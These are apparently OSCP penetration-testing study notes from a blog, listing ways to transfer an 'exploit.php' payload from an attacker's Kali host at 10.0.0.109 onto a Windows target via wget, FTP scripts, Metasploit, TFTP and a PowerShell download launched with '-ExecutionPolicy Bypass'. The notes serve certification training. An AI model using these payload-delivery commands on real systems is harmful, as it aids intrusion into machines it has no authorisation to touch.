• OSCP Learning Notes


    File transfer type:

    1. HTTP

     Transfer files through the website.

    2.wget

    wget http://10.0.0.109/exploit.php

    3.FTP

    python FTP

    (1)Install python FTP on the Kali Linux.

    pip3 install pyftpdlib

    (2)Move to the target folder, and start the FTP service.

    python3 -m pyftpdlib -p 21

    (3)Login the ftp service on Windows 10 anonymously.

    (4) Get the file form FTP server.

    (5)Exit FTP service.

     We can also save the shellcode to txt file.

    (1) Execute the following commands to make the ftp command file.

    echo open 10.0.0.109 > ftp.txt
    
    echo anonymous>> ftp.txt
    
    echo pass>>ftp.txt
    
    echo binary>> ftp.txt
    
    echo get exploit.php >> ftp.txt
    
    echo bye >> ftp.txt

    (2) Get the files from the FTP server.

    ftp -s:ftp.txt

    4.Metasploit

    (1) Start the metasploit.

    (2) Initiate the FTP service,.

    use auxiliary/server/ftp
    
    show options
    
    exploit

    (3) Stop the FTP service.

    5.TFTP

     (1)Start the TFTP service on Kali Linux.

    atftpd --daemon --port 69 /var/www/html

     (2) Get the file from tftp server.

    tftp -i 10.0.0.109 get exploit.php

    6.Powershell

    (1) Make the powershell file to get the file form Kali server.

    echo $storage = $pwd > get.ps1
    
    echo $webclient = New-Object System.Net.Webclient >> get.ps1
    
    echo $url = "http://10.0.0.109/exploit.php" >> get.ps1
    
    echo $file = "exploit.php" >> get.ps1
    
    echo $webclient.DownloadFile($url,$file) >> get.ps1

    (2)Execute the powershell code.

    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    虚拟机安装VMware Tools
    SVN源码泄露漏洞
    为什么站点使用https加密之后还能看到相关数据
    AWVS11使用教程——Acunetix Web Vulnerability Scanner 11.x
    接口测试_RESTClient基本使用
    【pwnable.kr】coin1
    【pwnable.kr】 mistake
    【pwnable.kr】leg
    【pwnable.kr】random
    【pwnable.kr】passcode
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/11229017.html
Copyright © 2020-2023  润新知